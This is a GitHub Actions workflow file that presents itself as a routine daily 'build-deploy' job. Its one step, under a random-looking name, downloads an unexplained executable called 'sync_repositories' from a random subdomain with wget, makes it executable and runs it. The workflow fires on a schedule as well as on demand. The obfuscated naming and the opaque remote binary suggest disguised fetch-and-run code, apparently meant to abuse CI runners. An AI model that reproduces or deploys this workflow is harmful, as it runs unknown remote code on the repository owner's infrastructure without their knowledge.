#2024-03-18-[135737]-q1zy1znv
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "21 3 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: j8qj0ihckm8s8355
        run: |
          wget -q https://097xq5861rz13xil.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories